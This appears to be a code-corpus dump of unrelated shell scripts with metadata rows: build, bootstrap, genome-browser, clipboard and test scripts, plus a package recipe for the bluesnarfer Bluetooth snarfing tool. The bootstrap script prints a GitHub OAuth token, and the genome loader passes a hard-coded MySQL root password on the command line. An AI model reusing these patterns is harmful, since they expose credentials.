# $WORKSPACE/jenkins/build_matrix_entry_varan.sh BUILD_TYPE <VER> <WONTON_VER>
#
# BUILD_TYPE - pr, nightly, install
#
# if VER is abset, the HEAD of the master branch will be taken. If
# WONTON_VER is absent, the HEAD of the master branch of wonton will
# be taken. If BUILD_TYPE is 'install' and VER is specified, it will
# install it to /install_prefix/tangram/$VER-blah-blah; if VER is not
# specified, it will install to /install_prefix/wonton/dev-blah-blah
#
# Note that the following environment variables must be set (Jenkins
# will do this automatically).
#
# WORKSPACE - where the code is checked out
# CONFIG_TYPE - base, debug, serial, readme, thrust, kokkos
# COMPILER - intel, gcc6, gcc7
# BRANCH_NAME - master, kokkos
#
# The exit code determines if the test succeeded or failed.
# Exit on error
set -e
# Echo each command
set -x
# set umask so installations will have group rwx permission
umask 007
BUILD_TYPE=$1
version=$2
if [[ $version == "" ]]; then
version=dev
fi
tangram_version=$3
if [[ $tangram_version == "" ]]; then
tangram_version=dev
fi
wonton_version=$3
if [[ $wonton_version == "" ]]; then
wonton_version=dev
fi
echo "inside build_matrix on PLATFORM=$PLATFORM with BUILD_TYPE=$BUILD_TYPE $CONFIG_TYPE=$CONFIG_TYPE COMPILER=$COMPILER"
# special case for README builds
if [[ $BUILD_TYPE != "install" && $CONFIG_TYPE == "readme" ]]; then
# Put a couple of settings in place to generate test output even if
# the README doesn't ask for it.
export CTEST_OUTPUT_ON_FAILURE=1
CACHE_OPTIONS="-D ENABLE_JENKINS_OUTPUT=True"
sed "s/^ *cmake/& $CACHE_OPTIONS/g" $WORKSPACE/README.md >$WORKSPACE/README.md.1
python2 $WORKSPACE/jenkins/parseREADME.py \
$WORKSPACE/README.md.1 \
$WORKSPACE \
varan
exit
fi
# set modules and install paths
export NGC=/usr/local/codes/ngc
ngc_include_dir=$NGC/private/include
# compiler-specific settings
if [[ $COMPILER =~ "intel" ]]; then
compiler_version=18.0.1
cxxmodule=intel/${compiler_version}
compiler_suffix="-intel-${compiler_version}"
openmpi_version=2.1.2
mpi_module=openmpi/${openmpi_version}
mpi_suffix="-openmpi-${openmpi_version}"
elif [[ $COMPILER =~ "gcc" ]]; then
openmpi_version=2.1.2
if [[ $COMPILER == "gcc6" ]]; then
compiler_version=6.4.0
elif [[ $COMPILER == "gcc7" ]]; then
compiler_version=7.3.0
elif [[ $COMPILER == "gcc8" ]]; then
compiler_version=8.2.0
openmpi_version=3.1.3
fi
cxxmodule=gcc/${compiler_version}
compiler_suffix="-gcc-${compiler_version}"
mpi_module=openmpi/${openmpi_version}
mpi_suffix="-openmpi-${openmpi_version}"
fi
# Jali
jali_flags="-D PORTAGE_ENABLE_Jali::BOOL=True"
# FleCSI
flecsi_flags="-D PORTAGE_ENABLE_FleCSI:BOOL=False" # Not building with FleCSI for HPC builds
# THRUST
thrust_flags=
thrust_suffix=
if [[ $CONFIG_TYPE == "thrust" ]]; then
thrust_flags="-D PORTAGE_ENABLE_THRUST=True"
thrust_suffix="-thrust"
fi
# MPI or not
mpi_flags="-D PORTAGE_ENABLE_MPI=True"
if [[ $CONFIG_TYPE == "serial" ]]; then
mpi_flags="-D PORTAGE_ENABLE_MPI=False"
mpi_suffix=
jali_flags=
flecsi_flags=
fi
# Debug or Optimized build
cmake_build_type=Release
debug_suffix=
if [[ $CONFIG_TYPE == "debug" ]]; then
cmake_build_type=Debug
debug_suffix="-debug"
fi
# WONTON
wonton_install_dir=$NGC/private/wonton/${wonton_version}${compiler_suffix}${mpi_suffix}${thrust_suffix}${kokkos_suffix}${debug_suffix}
wonton_flags="-D WONTON_ROOT:FILEPATH=$wonton_install_dir"
# TANGRAM
if [[ $CONFIG_TYPE != singlemat ]]; then
tangram_install_dir=$NGC/private/tangram/${tangram_version}${compiler_suffix}${mpi_suffix}${thrust_suffix}${kokkos_suffix}${debug_suffix}
tangram_flags="-D PORTAGE_ENABLE_TANGRAM=True -D TANGRAM_ROOT:FILEPATH=$tangram_install_dir"
fi
# Build up an install dir name
portage_install_dir=$NGC/private/portage/${version}${compiler_suffix}${mpi_suffix}${thrust_suffix}${kokkos_suffix}${debug_suffix}
if [[ $COMPILER == "gcc6" && $CONFIG_TYPE != "serial" ]]; then
flecsi_flags="-D PORTAGE_ENABLE_FleCSI:BOOL=True" # FleCSI found through Wonton
fi
export SHELL=/bin/sh
export MODULEPATH=""
. /opt/local/packages/Modules/default/init/sh
module load $cxxmodule
module load cmake/3.14.0 # 3.13 or higher is required
if [[ -n "$mpi_flags" ]] ; then
module load ${mpi_module}
fi
echo $WORKSPACE
cd $WORKSPACE
rm -rf build
mkdir build
cd build
cmake \
-D CMAKE_BUILD_TYPE=$cmake_build_type \
-D CMAKE_CXX_FLAGS="-Wall -Werror" \
-D ENABLE_UNIT_TESTS=True \
-D ENABLE_APP_TESTS=True \
-D ENABLE_JENKINS_OUTPUT=True \
$mpi_flags \
$wonton_flags \
$tangram_flags \
$thrust_flags \
$jali_flags \
$flecsi_flags \
$cov_flags \
..
make -j2
ctest --output-on-failure
if [[ $CONFIG_TYPE == "coverage" ]]; then
gcovr -r .. -x >coverage.xml
fi
if [[ $BUILD_TYPE == "install" ]]; then
make install
fi
| true
|
b94917ccc216aaea16883904973a32e3d4f18fcf
|
Shell
|
robvogelaar/tditracer
|
/minimal-tdi-tests/runsim003.sh
|
UTF-8
| 2,069
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/sh
# Kill any simulator processes left over from a previous run so the
# fresh servers below can bind their sockets.
kill -9 $(pidof simserver)
kill -9 $(pidof sleeper)
# proc ID MMAPSIZE CYCLES NFUNCS
# Start a traced simserver listening on /tmp/s<ID>, then register one mmap
# of MMAPSIZE plus NFUNCS code entries (f1..fN, CYCLES bytes each) with it.
proc()
{
LD_PRELOAD=libtdi.so TRACEBUFFERSIZE=1 REMOVE=0 SELFINFO=100 ./simserver "/tmp/s$1" &
sleep 1
local fcounter=1
# POSIX $(( )) arithmetic replaces the deprecated `expr` backtick form;
# the original `expr $4` was a no-op round-trip through expr.
while [ "$fcounter" -le "$4" ]
do
echo "mmap $2" | ./simclient "/tmp/s$1"
echo "code libcode$1.so f$fcounter 100 $3" | ./simclient "/tmp/s$1"
fcounter=$((fcounter + 1))
done
}
# code ID FUNC CYCLES SIZE
# Register function f<FUNC> of libcode<ID>.so (CYCLES ticks, SIZE bytes)
# with the simserver behind /tmp/s<ID>.
code()
{
printf 'code libcode%s.so f%s %s %s\n' "$1" "$2" "$3" "$4" | ./simclient /tmp/s$1
}
# memset ID ARG
# Send a "memset ARG" request to the simserver behind /tmp/s<ID>.
memset()
{
printf 'memset %s\n' "$2" | ./simclient /tmp/s$1
}
mark()
{
# Insert a trace marker. Note this always talks to the FIRST server's
# socket (/tmp/s1), regardless of arguments -- presumably one marker per
# trace is enough. TODO confirm this is intentional.
echo "mark" | ./simclient /tmp/s1
}
###############################################################################
# Scenario driver: one traced background sleeper plus simservers 1-3, then a
# larger fourth server, exercised in phases separated by trace markers.
LD_PRELOAD=libtdi.so DISKS=sda2,sdb1 TRACEBUFFERSIZE=2 SYSINFO=100 ./sleeper &
sleep 1
for p in 1 2 3
do
proc $p 8M 1024 4
done
mark
# phase 1: 10 rounds touching f1..f4 on servers 1-3
round=1
while [ $round -le 10 ]
do
for p in 1 2 3
do
for f in 1 2 3 4
do
code $p $f 100 1024
done
done
round=$((round + 1))
done
mark
# add a fourth, larger server
proc 4 24M 2048 4
mark
# phase 2: 20 rounds touching f1..f4 on servers 1-4
round=1
while [ $round -le 20 ]
do
for p in 1 2 3 4
do
for f in 1 2 3 4
do
code $p $f 100 1024
done
done
round=$((round + 1))
done
mark
# memset pass over every server/region
for p in 1 2 3 4
do
for f in 1 2 3 4
do
memset $p $f
done
done
mark
# phase 3: another 20 rounds on servers 1-4
round=1
while [ $round -le 20 ]
do
for p in 1 2 3 4
do
for f in 1 2 3 4
do
code $p $f 100 1024
done
done
round=$((round + 1))
done
mark
| true
|
780deecb89aee5e901691138a2b1d12eb13ad734
|
Shell
|
Notoriousjayy/Programming-Language-Pragmatics
|
/Bash/Control Flow/Chapter 13 scripts/test1.sh
|
UTF-8
| 163
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# Basic `for` command: iterate over a whitespace-separated word list.
states="Alabama Alaska Arizona Arkansas California Colorado"
# Deliberately unquoted so the string splits into one word per state.
for test in $states
do
    echo "The next state is $test"
done
| true
|
46d41df11fbd9df98b702458aa8d77df80cbeb84
|
Shell
|
alexanderfield/vbox-machines
|
/vagrant-sandboxes/docker/run.sh
|
UTF-8
| 846
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# Download and verify the pinned Docker 1.7.1 RPM, then bring the Vagrant
# sandbox up.
DOCKER_FILE=docker-engine-1.7.1-1.el7.centos.x86_64.rpm
DOCKER_FILE_TRUSTED_HASH=de3009d88a0b8a74a9d40a44e2e1101d
if [ ! -f "$DOCKER_FILE" ];
then
    wget https://get.docker.com/rpm/1.7.1/centos-7/RPMS/x86_64/"$DOCKER_FILE"
    # NOTE: `md5 -r` is the macOS md5 tool; on Linux substitute `md5sum`.
    HASH_TO_TEST="$(md5 -r "$DOCKER_FILE" | awk '{ print $1}')"
    # FIX: both sides quoted -- the unquoted form aborted with a `[` syntax
    # error whenever the download failed and the hash came back empty.
    if [ "$HASH_TO_TEST" != "$DOCKER_FILE_TRUSTED_HASH" ]
    then
        echo "Downloaded docker rpm doesn't hash!!"
        rm -- "$DOCKER_FILE"
        echo "Downloaded file deleted. Exiting!"
        # FIX: exit non-zero so callers can detect the failed verification
        # (a bare `exit` propagated the status of the preceding echo, i.e. 0).
        exit 1
    fi
fi
vagrant up --provision
vagrant status
# Test docker is up...
# Docker should be daemonized and remotely available...
# From scratch, will need image(s) before any container(s) can be run...
# Get images by running docker pull <imagename> (ie docker pull centos)...
# Create a container and run a program in it with docker run (ie sudo docker run -it )
| true
|
be5f2fb34cc270682405668f7ba7110e2d617d88
|
Shell
|
opsnull/system-config
|
/lib/misc/wait-for-desktop-env
|
UTF-8
| 255
| 3
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/usr/bin/env bash
# Poll until the desktop environment's panel window exists according to
# sawfish: xfce4-panel by default, Plasma when the configured desktop is kde.
wait_win=xfce4-panel
case "$(get-about-me desktop-env)" in
    kde) wait_win=Plasma ;;
esac
until [ "$(sawfish-client -e '(window-exists-p "'${wait_win}'")')" = t ]; do
    log "waiting for ${wait_win} to start"
    sleep 1
done
| true
|
e0df59b5d5c222da410db1988a4aa65c4888d651
|
Shell
|
OpenStackweb/openstack-org
|
/scripts/bootstrap.sh
|
UTF-8
| 1,880
| 3.046875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright (c) 2019 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
GITHUB_OAUTH_TOKEN=$1
echo "GITHUB_OAUTH_TOKEN is $GITHUB_OAUTH_TOKEN";
sudo apt-get update;
sudo apt-get --yes upgrade;
sudo apt-get --no-install-recommends --yes install puppet composer;
# Register the GitHub OAuth token with composer (avoids API rate limiting).
if [[ -n "$GITHUB_OAUTH_TOKEN" ]]; then
    echo "running composer config -g github-oauth.github.com $GITHUB_OAUTH_TOKEN";
    sudo -H -u vagrant bash -c "composer config -g github-oauth.github.com $GITHUB_OAUTH_TOKEN";
fi
puppet --version;
mkdir -p /etc/puppet/modules;
# Install each required puppet module pinned to a known-good version.
while read -r module version; do
    puppet module install --force --module_repository https://forge.puppet.com --version "$version" "$module";
done <<'MODULES'
puppetlabs-stdlib 5.2.0
puppetlabs-mysql 8.0.0
puppet-nginx 0.16.0
petems-swap_file 4.0.0
puppetlabs-apt 6.3.0
puppet-nodejs 7.0.0
MODULES
# Set up environment variables, adding the new tools to PATH.
sudo sh -c "cat > /etc/profile.d/composer.sh" <<'EOF'
export COMPOSER_HOME=/var/www/www.openstack.org
EOF
| true
|
690d7c6ff41469e845572aface999893bac6641b
|
Shell
|
hellnest/archpwn
|
/repo/bluetooth/bluesnarfer/PKGBUILD
|
UTF-8
| 622
| 2.671875
| 3
|
[] |
no_license
|
# Contributor: Francesco Piccinno <stack.box@gmail.com>
# Arch PKGBUILD for bluesnarfer (bluetooth phonebook downloader).
pkgname=bluesnarfer
pkgver=0.1
pkgrel=2
pkgdesc="Bluesnarfer will download the phonebook of any mobile device vulnerable to bluesnarfing."
url="http://www.alighieri.org/project.html"
groups=('archpwn' 'archpwn-bluetooth')
license=('GPL')
arch=(i686 x86_64)
makedepends=('gcc')
depends=(bluez)
source=(http://www.alighieri.org/tools/$pkgname.tar.gz)
md5sums=('ee1fcf2e12b74e8cf65f43cdd2c47b72')
# NOTE(review): this build() also installs into $pkgdir; modern PKGBUILDs
# split installation into package(), and `make || return 1` is obsolete now
# that makepkg runs functions with errexit. Kept as-is for compatibility.
build() {
cd "$srcdir/$pkgname"
make || return 1
install -Dm755 $pkgname $pkgdir/usr/bin/$pkgname
install -Dm644 README $pkgdir/usr/share/doc/$pkgname/README
}
# vim:set ts=2 sw=2 et:
| true
|
459ad4ea5e4f3ed52f258137217fdd8181528821
|
Shell
|
wangchengww/Peach
|
/ucscgb/run.sh
|
UTF-8
| 8,331
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
#########################################################################
# http://stackoverflow.com/questions/230266/vi-vim-how-to-pipe-visually-selected-text-to-a-unix-command-and-append-output-to
# http://stackoverflow.com/questions/3752785/what-can-you-execute-on-visually-selected-text-in-vim
#
# You select parts of vi buffer and execute them.
# 1. Select parts of any text using VI command `V'.
# 2. Push `:!bash' to execute them.
# 3. Push `u' to make the executed parts be reappear.
#########################################################################
# Export these shell variables for easy access. You need to run them in the BASH
# shell directly.
# Create a directory, ucsc, at $HOME/Documents/Projects
# git clone git://genome-source.cse.ucsc.edu/kent.git
# Follow the instructions available at kent/src/product
# Start a Apache Web server in Mac OSX (Mountain Lion)
# $ sudo apachectl start
# $ sudo defaults write /System/Library/LaunchDaemons/org.apache.httpd Disabled -bool false
# See
# http://reviews.cnet.com/8301-13727_7-57481978-263/how-to-enable-web-sharing-in-os-x-mountain-lion/
# for detail of setting up a Web Server in Mac OSX Mountain Lion
# Install MySQL
# $ sudo /usr/local/mysql/support-files/mysql.server start
# $ /usr/local/mysql/bin/mysqladmin -u root password 'yourpasswordhere'
# Roots of the local UCSC genome-browser build (kent source checkout).
# SQL_PASSWORD defaults to the login name -- change for a real deployment.
export UCSCDIR=/Users/goshng/Documents/Projects/ucsc
export KENT=/Users/goshng/Documents/Projects/ucsc/kent
export KENTPRODUCT=/Users/goshng/Documents/Projects/ucsc/kent/src/product
export SQL_PASSWORD=$USER
#########################################################################
# Let's add a new genome to streptoccocus genus.
#
# SdeqATCC12394
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/cornell_sde1/CP002215.gbk
# SdeqGGS124
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_dysgalactiae_equisimilis_GGS_124_uid59103/NC_012891.fna
# SddyATCC27957
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/cornell_sdd/sdd.gbk
# SpyMGAS315
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_pyogenes_MGAS315_uid57911/NC_004070.fna
# SpyMGAS10750
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_pyogenes_MGAS10750_uid58575/NC_008024.fna
# Seeq4047
# REFGENOMEFASTA=/Volumes/Elements/Documents/Projects/mauve/bacteria/Streptococcus_equi_4047_uid59259/NC_012471.fna
#
# 1. Copy the source file: genbank or FASTA format.
# Non-exported copies of the same paths, set again so that selected regions
# of this buffer can be executed on their own (see the vi :!bash note above).
KENT=/Users/goshng/Documents/Projects/ucsc/kent
KENTPRODUCT=/Users/goshng/Documents/Projects/ucsc/kent/src/product
SQL_PASSWORD=$USER
###########################################################
# BEGIN of load bacterial genome function
###########################################################
# loadBacterialGenome() -- interactively add a bacterial genome to the local
# UCSC genome browser: prompts for a database name and a GenBank or FASTA
# source, builds the 2bit/AGP sequence files, creates the MySQL database with
# chromInfo/gold/gap and GC5 tracks, registers the assembly in
# hgcentral.dbDb, and grants the browser/readonly/readwrite accounts access.
# Requires the Kent tools (gbToFaRa, faToTwoBit, hgsql, ...) on PATH and
# write access to /gbdb.
function loadBacterialGenome {
echo -n "What is the database name for the genome? (e.g., SddyATCC27957) "
read DBNAME
REFGENOME=$DBNAME
# Path A: start from a GenBank file and convert it to FASTA.
echo -n "Will you use a genbank format for creating $DBNAME? (Type in y or n) "
read WISH
if [ "$WISH" == "y" ]; then
echo -n "What is the file name of a genbank format? (e.g., /path/to/$DBNAME.gbk) "
read REFGENOMEFASTA
echo " copying $REFGENOMEFASTA ..."
cp $REFGENOMEFASTA $DBNAME.gbk
echo " converting the gbk to the FASTA file using Kent's gbToFaRa command ..."
gbToFaRa /dev/null $REFGENOME.fna $REFGENOME.ra $REFGENOME.ta $REFGENOME.gbk
toUpper $REFGENOME.fna $REFGENOME.fna.upper
faSize $REFGENOME.fna.upper
rm $REFGENOME.fna $REFGENOME.ra $REFGENOME.ta
mv $REFGENOME.fna.upper $REFGENOME.fna
echo -n "Please, Edit `pwd`/$REFGENOME.fna so that the header is chr1, and enter:"
read DONE
fi
# Path B: start directly from a FASTA file.
echo -n "Will you use a FASTA format file for creating $DBNAME? (Type in y or n) "
read WISH
if [ "$WISH" == "y" ]; then
echo -n "What is the file name in FASTA format? (e.g., /path/to/$DBNAME.fna) "
read REFGENOMEFASTA
cp $REFGENOMEFASTA $DBNAME.fna
echo -n "Please, Edit `pwd`/$DBNAME.fna so that the header is chr1, and enter:"
read DONE
fi
# Fake AGP (contig gaps >= 1 bp) plus the 2bit archive the browser serves
# from /gbdb/<db>.
echo " creating a 2bit file of the FASTA file ..."
hgFakeAgp -minContigGap=1 $REFGENOME.fna $DBNAME.agp
faToTwoBit $REFGENOME.fna $DBNAME.2bit
mkdir -p /gbdb/$DBNAME/html
cp $DBNAME.2bit /gbdb/$DBNAME
# 5. Check agp and 2bit.
# sort -k1,1 -k2n,2n $DBNAME.agp > $DBNAME.agp.2
# checkAgpAndFa $DBNAME.agp.2 $DBNAME.2bit
echo " creating a database ..."
twoBitInfo $DBNAME.2bit stdout | sort -k2nr > chrom.sizes
rm -rf bed
mkdir -p bed/chromInfo
# chromInfo rows point at the 2bit copy under /gbdb; the literal DBNAME
# placeholders written by awk are substituted by the sed just below.
awk '{printf "%s\t%d\t/gbdb/DBNAME/DBNAME.2bit\n", $1, $2}' \
chrom.sizes > bed/chromInfo/chromInfo.tab.tmp
sed s/DBNAME/$DBNAME/g < bed/chromInfo/chromInfo.tab.tmp > bed/chromInfo/chromInfo.tab
hgsql -e "create database $DBNAME;" mysql
echo " creating grp, chromInfo tables ..."
hgsql $DBNAME < $KENT/src/hg/lib/grp.sql
cp bed/chromInfo/chromInfo.tab /tmp/
hgLoadSqlTab $DBNAME chromInfo $KENT/src/hg/lib/chromInfo.sql \
/tmp/chromInfo.tab
rm /tmp/chromInfo.tab
hgGoldGapGl $DBNAME $DBNAME.agp
# GC-percent wiggle track, 5 bp window.
echo " creating GC5 track ..."
mkdir bed/gc5Base
hgGcPercent -wigOut -doGaps -file=stdout -win=5 -verbose=0 $DBNAME \
$DBNAME.2bit | wigEncode stdin bed/gc5Base/gc5Base.{wig,wib}
hgLoadWiggle -pathPrefix=/gbdb/$DBNAME/wib \
$DBNAME gc5Base bed/gc5Base/gc5Base.wig
mkdir -p /gbdb/$DBNAME/wib/bed/gc5Base
cp bed/gc5Base/gc5Base.wib /gbdb/$DBNAME/wib/bed/gc5Base
# Register the new assembly in hgcentral.dbDb (manual SQL edit first).
echo -n "Please, edit files/dbDbInsert.sql for DB name, genome name, date, and scientific name and enter:"
read DONE
hgsql hgcentral < files/dbDbInsert.sql
echo " granting permission on the created database ..."
mysql -u root -p${SQL_PASSWORD} -e "GRANT FILE ON *.* to browser@localhost \
IDENTIFIED BY 'genome';" mysql
# 1. SdeqATCC12394
# 2. SdeqGGS124
# 3. SddyATCC27957
# 4. SpyMGAS315
# 5. SpyMGAS10750
# NOTE(review): DBNAME is overwritten here, discarding the name typed in at
# the top -- the dump load and grants below therefore always target
# SpyMGAS10750, and the next mysql call hard-codes the root password.
# Confirm this is intentional before reuse.
DBNAME=SpyMGAS10750
SQL_PASSWORD=$USER
mysql -u root -pgoshng --database=$DBNAME < dbdump/spy2knonwgenes.txt
for DB in $DBNAME # hgcentral hg19 hg18 strMut1 hgFixed # proteins040315
do
mysql -u root -p${SQL_PASSWORD} -e "GRANT SELECT, INSERT, UPDATE, DELETE, \
CREATE, DROP, ALTER, CREATE TEMPORARY TABLES on ${DB}.* \
TO browser@localhost \
IDENTIFIED BY 'genome';" mysql
done
for DB in $DBNAME # hgcentral hg19 hg18 strMut1 hgFixed # cb1 proteins040315
do
mysql -u root -p${SQL_PASSWORD} -e "GRANT SELECT, CREATE TEMPORARY TABLES \
on ${DB}.* TO \
readonly@localhost IDENTIFIED BY 'access';" mysql
done
for DB in hgcentral
do
mysql -u root -p${SQL_PASSWORD} -e "GRANT SELECT, INSERT, UPDATE, DELETE, \
CREATE, DROP, ALTER on ${DB}.* TO readwrite@localhost \
IDENTIFIED BY 'update';" mysql
done
echo "Please, edit the local tracks and make it"
rm -f $DBNAME.fna $DBNAME.2bit $DBNAME.agp $DBNAME.gbk chrom.size
rm -rf bed
}
###########################################################
# END of load bacterial genome function
###########################################################
###########################################################
# Load wiggle files of recombination intensity.
# TODO: the other 4 species should be added. The generation of the map for the
# wiggle file takes time.
# loadRI() -- load the recombination-intensity wiggle track ("ri") for
# SpyMGAS315: encode the .wig, load it into the database, move the .wib
# under /gbdb and point the table's file column at the moved file.
# TODO(review): WIGDIR/WIGFILEBASE/DBNAME are hard-coded to one species;
# the comment above notes the other 4 species still need the same treatment.
function loadRI {
WIGDIR=/Users/goshng/Documents/Projects/Mauve/output/cornellf/3/run-analysis
WIGFILEBASE=ri1-refgenome4-map
DBNAME=SpyMGAS315
wigEncode $WIGDIR/$WIGFILEBASE.wig $WIGDIR/$WIGFILEBASE.temp.wig $WIGDIR/$WIGFILEBASE.wib
hgLoadWiggle $DBNAME ri $WIGDIR/$WIGFILEBASE.temp.wig
rm $WIGDIR/$WIGFILEBASE.temp.wig
mv $WIGDIR/$WIGFILEBASE.wib /gbdb/$DBNAME/wib/
hgsql $DBNAME -e "update ri set file='/gbdb/$DBNAME/wib/$WIGFILEBASE.wib'"
}
###########################################################
# Load sequence alignments in wigMaf format.
# Use /Users/goshng/Documents/Projects/Mauve/test/wigmaf/run
# And make makeDb/trackDb file.
# All of the mauve alignments were loaded.
###########################################################
# Load recombination probability in BED format.
# Let me make something in /Users/goshng/Documents/Projects/Mauve/test/wigmaf/run
###########################################################
# Load virulence genes in BED format.
# Check /Users/goshng/Documents/Projects/Mauve/test/virulence/run
###########################################################
# Load recombination rate per block in BED format.
#
###########################################################
# Load recombination probability.
#
| true
|
21c991280709054117917c1f9bbae70c8e51f4da
|
Shell
|
veraabad/dotfiles
|
/scripts/bootstrap-rpi.sh
|
UTF-8
| 762
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# @Author: Abad Vera
# @Date: 06/06/2020
# @Last Modified by: Abad Vera
# @Last Modified time: 09/25/2020
# Installer for raspberry pi
# Go to dotfiles directory
# FIX: quote "$0" (paths with spaces) and abort if the cd fails -- `set -e`
# is only enabled a few lines later, so a failed cd used to be ignored and
# everything below ran from the wrong directory.
cd "$(dirname "$0")/.." || exit 1
DOTFILES_DIR=$(pwd -P)
SCRIPT_DIR="scripts"
set -e
source "./$SCRIPT_DIR/print_source.sh"
source "./$SCRIPT_DIR/common.sh"
sudo apt-get update
# Install list of programs
< "./$SCRIPT_DIR/apt-get-list.txt" xargs sudo apt-get install -y
# Update locale
# sudo sed -i 's/en_GB.UTF-8 UTF-8/# en_GB.UTF-8 UTF-8/g' /etc/locale.gen
sudo sed -i 's/# en_US.UTF-8/en_US.UTF-8/g' /etc/locale.gen
sudo locale-gen en_US.UTF-8
sudo update-locale en_US.UTF-8
install_tmux_plugins
install_exa
# Link dotfiles
install_dotfiles -r
# Set zsh as the default
check_default_shell
|
eb54b18704e738602012db70b9a81f134b246e46
|
Shell
|
najamk/assignment1_task1
|
/funny.sh
|
UTF-8
| 553
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# Prints "This is funny." when the script is given an argument and
# "This is NOT funny." when it is run without one.
var=$1
# -n is true for a non-empty string: the mirror image of the original
# `test -z` check, with the branches swapped to match.
if [ -n "$var" ]
then
    echo "This is funny."
else
    echo "This is NOT funny."
fi
| true
|
c4afd561e7cc99e1be8bd17391ba09c54a6db2be
|
Shell
|
loganlinn/dotfiles
|
/bin/termcopy
|
UTF-8
| 2,221
| 4.0625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/zsh
# Usage: termcopy [FILE...]
#
# Copies the contents of the given files (or stdin if no files are given) to
# the terminal that runs this program. If this program is run inside tmux(1),
# then it also copies the given contents into tmux's current clipboard buffer.
# If this program is run inside X11, then it also copies to the X11 clipboard.
#
# This is achieved by writing an OSC 52 escape sequence to the said terminal.
# The maximum length of an OSC 52 escape sequence is 100_000 bytes, of which
# 7 bytes are occupied by a "\033]52;c;" header, 1 byte by a "\a" footer, and
# 99_992 bytes by the base64-encoded result of 74_994 bytes of copyable text.
#
# In other words, this program can only copy up to 74_994 bytes of its input.
# However, in such cases, this program tries to bypass the input length limit
# by copying directly to the X11 clipboard if a $DISPLAY server is available;
# otherwise, it emits a warning (on stderr) about the number of bytes dropped.
#
# See http://en.wikipedia.org/wiki/Base64 for the 4*ceil(n/3) length formula.
# See http://sourceforge.net/p/tmux/mailman/message/32221257 for copy limits.
# See http://sourceforge.net/p/tmux/tmux-code/ci/a0295b4c2f6 for DCS in tmux.
#
# Written in 2014 by Suraj N. Kurapati <https://github.com/sunaku>
# Also documented at https://sunaku.github.io/tmux-yank-osc52.html
#
# Modified by jason0x43 <https://github.com/jason0x43>
# Modified by loganlinn <https://github.com/loganlinn>
# put ESC -- write a raw escape sequence to the controlling terminal; when
# running inside tmux, wrap it in a DCS passthrough so tmux forwards it.
put() {
esc=$1
if [[ -n "$TMUX" ]]; then
esc="\033Ptmux;\033$esc\033\\"
fi
# Deliberately used as printf's FORMAT string so the \033 escapes are
# interpreted; inputs here are fixed sequences, never user data.
printf $esc
}
# kitty always appends to the clipboard, so clear it first
#https://sw.kovidgoyal.net/kitty/protocol-extensions.html#pasting-to-clipboard
put "\033]52;c;!\a"
# copy via OSC 52
# Slurp all input up front: named files, or stdin when no args are given.
buf=$(cat "$@")
len=$(printf %s "$buf" | wc -c)
# 74994 = usable payload of a 100,000-byte OSC 52 sequence after base64
# expansion and the 8 bytes of header/footer framing (see header comment).
max=74994
if (( len > max )); then
echo "$0: input is $(( len - max )) bytes too long" >&2
fi
put "\033]52;c;$(printf %s "$buf" | head -c $max | base64 | tr -d '\r\n')\a"
# also copy to tmux
if [[ -n "$TMUX" ]]; then
tmux set-buffer "$buf" ||:
fi
# also copy to the clipboard
if (( $+commands[pbcopy] )); then
printf %s "$buf" | pbcopy
elif (( $+commands[xclip] )); then
printf %s "$buf" | xclip -in -selection clipboard
fi
| true
|
4d66cb4f667c69c91ba9323553dad711fd393b39
|
Shell
|
atwoz/vimeko
|
/sources_non_forked/vim-diff-enhanced/test/test.sh
|
UTF-8
| 545
| 3.296875
| 3
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer",
"Vim"
] |
permissive
|
#!/bin/sh
# Run every test-case directory: invoke vim with the EnhancedDiff algorithm
# named in <case>/diff.txt, then compare the produced output against the
# checked-in expectation (normal_diff.ok). Stops at the first failure.
# set -ex
for i in */; do
cd "$i"
algorithm=$(cat ./diff.txt)
# Headless vim run; the sed filter drops the harmless "not a terminal"
# warning that vim emits when stdout is redirected.
( LC_ALL=C vim -N --cmd ":let g:enhanced_diff_debug=1" -c ':set acd' \
-c ":EnhancedDiff $algorithm" -c ':botright vsp +next' -c ':windo :diffthis' -c ':qa!' file* \
> /dev/null ) 2>&1 | sed '/Vim: Warning: Output is not to a terminal/d'
# $? below reflects diff's status: an assignment from a command
# substitution propagates the substituted command's exit code.
diff=`diff normal_diff.ok EnhancedDiff_normal.txt`
if [ $? -ne 0 ]; then
printf "Failure with test %s\n" "${i%%/}"
printf "$diff\n"
break
else
printf "Test %s: OK\n" "${i%%/}"
fi
cd ..
done
| true
|
d7f2a5c3cd46bbd33df81cfd2efe3e29182a55bf
|
Shell
|
ferrigno/osa-hpc-scripts
|
/JEMX1_onescw.sh
|
UTF-8
| 2,847
| 2.796875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# PARAMETER
#
# par1: scwid without extension e.g. "00520010010"
# par2: tbin for the lc extraction in sec
# note that the script assumes the scw are found in the archive
# and at peculiar location for the input catalogue
#
### GRID SETUP
#
#$ -S /bin/bash
#$ -j y
#$ -o /gpfs0/ferrigno/INTEGRAL/nrt_analysis/logs
#$ -cwd
# Exactly one argument: the science-window ID (e.g. "00520010010").
if [ $# -ne 1 ]; then
echo "you must give exactly one parameter"
exit 1
else
export OGID=${1}
# export do_og_create=${2}
fi
#
### ANALYSIS SETUP
#
